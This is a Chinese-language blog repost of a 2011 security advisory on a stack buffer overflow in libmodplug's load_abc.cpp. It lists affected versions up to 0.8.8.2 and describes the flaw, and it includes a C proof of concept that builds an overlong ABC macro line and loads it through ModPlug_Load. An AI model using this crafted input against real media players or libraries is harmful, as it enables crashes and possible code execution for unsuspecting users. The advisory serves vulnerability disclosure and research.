当前位置: 文江博客话题详情

libmodplug "load_abc.cpp"远程栈缓冲区溢出漏洞

发布于 2022-10-15 07:44:09 字数 3180 浏览 16 评论 0

libmodplug "load_abc.cpp"远程栈缓冲区溢出漏洞

发布日期:2011-04-28
更新日期:2011-05-04

受影响系统:
libmodplug libmodplug 0.8.8 2
libmodplug libmodplug 0.8.8 1
libmodplug libmodplug 0.8.7
libmodplug libmodplug 0.8.7
libmodplug libmodplug 0.8.6
libmodplug libmodplug 0.8.4
libmodplug libmodplug 0.8
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 47624

Libmodplug是用于播放mod类音乐格式的开源函数库。

libmodplug "load_abc.cpp"在实现上存在远程栈缓冲区溢出漏洞,远程攻击者可利用此漏洞以使用受影响库的应用程序用户权限执行任意代码,造成拒绝服务。

此漏洞源于src/load_abc.cpp "abc_new_macro()"和"abc_new_umacro()"函数中的边界错误,通过诱使用户打开特制的ABC文件造成栈缓冲区溢出。

<*来源:epiphant
  *>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

epiphant ()提供了如下测试方法:

  1. #include <libmodplug/modplug.h>
  2. #include <stdio.h>
  3. #include <string.h>
  5. /*
  6. libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc
  8. http://modplug-xmms.sourceforge.net/
  10. by: epiphant
  12. this exploits one of many overflows in load_abc.cpp lol
  14. vlc media player uses libmodplug
  16. greets: defrost, babi, ming_wisher, emel1a, a.v., krs
  18. date: 28 april 2011
  20. tested on: centos 5.6
  21. */
  23. int main(void)
  24. {
  25.   char test[512] = "X: 1\nU: ";
  26.   unsigned int i;
  28.   i = strlen(test);
  29.   while (i < 278)
  30.     test[i++] = 'Q';
  31.   test[i++] = '1' + 32;
  32.   test[i++] = '3';
  33.   test[i++] = '3';
  34.   test[i++] = '4';
  35.   while (i < 286)
  36.     test[i++] = 'A';
  37.   test[i++] = '\n';
  38.   test[i] = '\0';
  40.   strcat(test, "T: Here Without You (Transcribed by: Bungee)\n");
  41.   strcat(test, "Z: 3 Doors Down\n");
  42.   strcat(test, "L: 1/4\n");
  43.   strcat(test, "Q: 108\n");
  44.   strcat(test, "K: C\n\n");
  45.   strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n");
  47.   i = strlen(test);
  48.   ModPlug_Load(test, i);
  50.   return 0;
  51. }

复制代码建议:
--------------------------------------------------------------------------------
厂商补丁:

libmodplug
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://modplug-xmms.sourceforge.net/

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

逐鹿

暂无简介

0 文章
0 评论
23 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

留蓝

文章 0 评论 0

18790681156

文章 0 评论 0

zach7772

文章 0 评论 0

Wini

文章 0 评论 0

ayeshaaroy

文章 0 评论 0

初雪

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文